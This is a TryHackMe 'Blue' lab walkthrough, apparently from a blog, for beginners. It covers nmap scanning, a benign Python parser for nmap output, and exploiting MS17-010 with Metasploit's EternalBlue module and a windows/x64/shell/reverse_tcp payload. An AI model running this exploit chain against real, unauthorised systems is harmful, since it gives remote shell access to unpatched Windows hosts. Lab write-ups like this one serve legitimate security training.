TryHackMe: Blue

theUnknown
6 min read · May 4, 2021

An educational series on Windows exploitation for complete beginners. A walkthrough.

Source: Varg (THM Profile)

Task 1: Recon

We start our recon with scanning the target machine using Nmap.

How many ports are open with a port number under 1000?

3

Running the scan with the -A flag covers more than we need here (a heavier scan with extra detection), and we only need port numbers under 1000. It is better to restrict the scan to the first 1000 ports with -p 1-1000.
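To answer the first question without counting by eye, the scan can be saved in Nmap's grepable format (-oG) and parsed. The following is an added example, not part of the original walkthrough: it reads a constructed -oG sample (the 10.10.10.10 address and the port list are made up for illustration, not taken from the room) and counts open TCP ports below 1000, which is exactly what the question asks for.

```python
import re

# Constructed sample of nmap grepable (-oG) output; the host and ports
# are invented for this example and are not from a real scan.
SAMPLE_GREPABLE = (
    "# Nmap 7.91 scan initiated as: nmap -sV -p 1-1000 -oG - 10.10.10.10\n"
    "Host: 10.10.10.10 ()\tStatus: Up\n"
    "Host: 10.10.10.10 ()\tPorts: 135/open/tcp//msrpc///, "
    "139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, "
    "3389/open/tcp//ms-wbt-server///, 3306/closed/tcp//mysql///"
    "\tIgnored State: filtered (995)\n"
    "# Nmap done\n"
)

# One -oG port entry looks like: port/state/protocol/owner/service/rpc/version/
PORT_RE = re.compile(r"(\d+)/([^/]+)/(tcp|udp)/([^/]*)/([^/]*)/")


def parse_ports(grepable):
    """Return (port, state, protocol, service) tuples from -oG text."""
    results = []
    for line in grepable.splitlines():
        # Only "Host:" lines that carry a "Ports:" field contain port data.
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        # The Ports field ends at the next tab-separated field (e.g. "Ignored State:").
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for m in PORT_RE.finditer(ports_field):
            port, state, proto, _owner, service = m.groups()
            results.append((int(port), state, proto, service))
    return results


def count_open_under(grepable, limit=1000):
    """Count ports reported 'open' whose number is below `limit`."""
    return sum(
        1 for port, state, _proto, _svc in parse_ports(grepable)
        if state == "open" and port < limit
    )


def exposed_smb(grepable):
    """True if TCP 445 (SMB) is open; this is the service the later
    vulnerability scan and patch check are concerned with."""
    return any(
        port == 445 and state == "open" and proto == "tcp"
        for port, state, proto, _svc in parse_ports(grepable)
    )


if __name__ == "__main__":
    print("open ports under 1000:", count_open_under(SAMPLE_GREPABLE))
    print("SMB exposed:", exposed_smb(SAMPLE_GREPABLE))
```

On a real run you would replace the constructed sample with the contents of a file written by `nmap -p 1-1000 -oG scan.gnmap <target>`; the parser ignores closed ports and anything above the limit, so the count it returns is the answer the question expects.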

What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

ms17-010

To get this answer I ran the Nmap vulnerability script category, which scans the host for known vulnerabilities (replace the placeholder with the target's IP address):

nmap --script vuln <target-ip>

(Screenshot: nmap --script vuln command)

Task 2: Gain Access

Start Metasploit

(To do that, type the following command in the terminal:)

msfconsole

Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

exploit/windows/smb/ms17_010_eternalblue

Show options and set the one required value. What is the name of this value? (All caps for submission)

RHOSTS
(Screenshot: Task 2 initial steps)

Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:

set payload windows/x64/shell/reverse_tcp

With that done, run the exploit!

run
(Screenshot: set payload and run the exploit)

Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell.
